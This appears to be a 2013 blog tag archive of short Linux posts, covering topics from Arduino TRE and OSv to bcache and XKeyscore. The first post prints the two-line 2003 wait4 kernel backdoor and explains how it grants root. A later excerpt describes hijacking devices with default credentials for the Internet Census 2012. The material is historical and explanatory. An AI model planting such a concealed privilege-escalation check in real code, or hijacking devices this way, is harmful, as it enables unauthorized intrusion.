The Linux Backdoor Attempt of 2003

Posted on October 9, 2013 by mea

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current -> uid == 0. Sneaky!

Linux-capable Arduino TRE debuts at Maker Faire Rome

Posted on October 5, 2013 by mea

As Zoe Romano puts it in an Arduino blog post, “the Arduino TRE is two Arduinos in one.” Basically, the new ARM Cortex-A8-based Sitara AM335x’s job is to run Linux applications and manage the SBC’s PC-style interfaces (video, audio, Ethernet, USB, optional WiFi, etc.), while an Atmel ATmega microcontroller takes care of the SBC’s real-world I/O (analog inputs, digital I/O, PWM outputs, etc) and handles the interface to shields (Arduino expansion modules) in a fully AVR-compatible manner. Best of all, Romano points out, the 1GHz TI ARM processor offers up to “100 times more performance” than Arduino’s earlier Leonardo and Uno boards, writes Romano.

via Linux-capable Arduino TRE debuts at Maker Faire Rome · LinuxGizmos.com.

What’s unique about the TRE, however, is that its Linux OS runs on an ARM processor that’s truly integrated into the SBC’s basic architecture, as opposed to being a collateral benefit of a WiFi add-on module. As a result, the TRE will support a “full Linux” OS in contrast to the Yun’s Linino OS, a custom version of the lightweight OpenWRT embedded Linux distribution.

Choosing a Journaling File System

Posted on September 30, 2013 by mea

A journaling file system is a special type of file system that maintains a tracking file, called a journal. The journal enables the system to repair any inconsistencies that may arise as a result of a system halted abnormally. It does this by keeping track of changes that are made before committing them to the main file system. In the event that the computer is not shut down properly, any data loss can be recreated. This type of file system is therefore less likely to suffer from corruption, and brings file systems back online quickly.

via Choosing a Journaling File System – Linux Links – The Linux Portal Site.

OSv, a new open-source operating system for virtual machines

Posted on September 17, 2013 by mea

These days, most applications running on virtual machines in the cloud run on top of Linux. We all love Linux, but as an all-encompassing operating system for everything from phones to supercomputers, Linux was never really designed for virtual machines; It is big and complex, and it offers features (such as multi-user and multi-process) which are today made redundant by the hypervisor and slow it down. Linux’s APIs are many times set in stone by decades of legacy code. All these cost in application performance, and make it harder to innovate.

This is why we developed OSv, a new operating system designed to run a single application on a virtual machine. As it runs a single application there is no need for kernel-userspace isolation, reducing context switch costs and unnecessary copying. A design from scratch allowed us to experiment with new ideas like lock-free mutexes (solving the Lock-Holder Preemption problem that plagues operating systems on virtual machines), extremely fast context switches, Van Jacobson’s network channels (see http://www.lemis.com/grog/Documentation/vj/lca06vj.pdf), and more. Also, OSv is released under the more permissive BSD license (not GPL like Linux), is tiny compared to Linux, and takes less than one second to boot and start the user’s application.

via Announce: OSv, a new open-source operating system for virtual machines.

Presentation slides can be seen here.

Linux-based autopilots target commercial UAVs

Posted on August 17, 2013 by mea

The computers offer pre-installed flight control and mission software built upon the Linux-based AirwareOS platform. The software is provided under a royalty-free license that enables modification, extension third party software, and inclusion in proprietary products, says the company. The Linux-based software is written in C++, and provides a single hardware-independent Unified Autopilot Interface (UAI) API to the INS/GPS solution, system status, sensor data, actuators, datalink radio, and payloads.

via Linux-based autopilots target commercial UAVs · LinuxGizmos.com.

The evolution of the NSA’s XKeyscore

Posted on August 10, 2013 by mea

In the current generation of Narus’ system, the processing systems run on commodity Linux servers and re-assemble network sessions as they’re captured, mining them for metadata, file attachments, and other application data and then indexing and dumping that information to a searchable database.

via Building a panopticon: The evolution of the NSA’s XKeyscore | Ars Technica.

Attacks on Package Managers

Posted on June 14, 2013 by mea

To provide an example of the sorts of attacks an attacker can launch on package managers, this page describes an example attack called a replay attack. Other attacks are described on a separate page.

via Attacks on Package Managers.

Here’s a piece of advice I always adhere to for any kind of upgrade.

Manually update your systems (and local mirror caches). Know when package updates become available and what the versions should be. Manually verify and install the updated packages (or add them to your local mirror cache that your systems update from) rather than relying on automated updates. We have observed mirrors many months out of date for some distributions, so you should check periodically that your mirror is being updated.

Linux Group Tests

Posted on June 10, 2013 by mea

The original objective in starting the compilation was to dispel the FUD that Linux does not have the necessary software to compete with Windows. Over time, the aim of the compilation was to enable Linux users, whatever their level of computing experience, to identify software of all types that is worth exploring. With the huge range of open source software available, there is simply not enough time for users to evaluate every application even within a single category of software.

The compilation is being frequently updated and new articles added on a regular basis.

via Linux Group Tests – Part 1 – Linux Links – The Linux Portal Site.

bcache

Posted on May 9, 2013 by mea

Bcache is a Linux kernel block layer cache. It allows one or more fast disk drives such as flash-based solid state drives (SSDs) to act as a cache for one or more slower hard disk drives.

Hard drives are cheap and big, SSDs are fast but small and expensive. Wouldn’t it be nice if you could transparently get the advantages of both? With Bcache, you can have your cake and eat it too.

via bcache.

Internet Census 2012

Posted on May 3, 2013 by mea

Abstract While playing around with the Nmap Scripting Engine (NSE) we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. We used these devices to build a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.

All data gathered during our research is released into the public domain for further study.

via Internet Census 2012.

Bucktown Bell

Cut to the chase.

Tag Archives: linux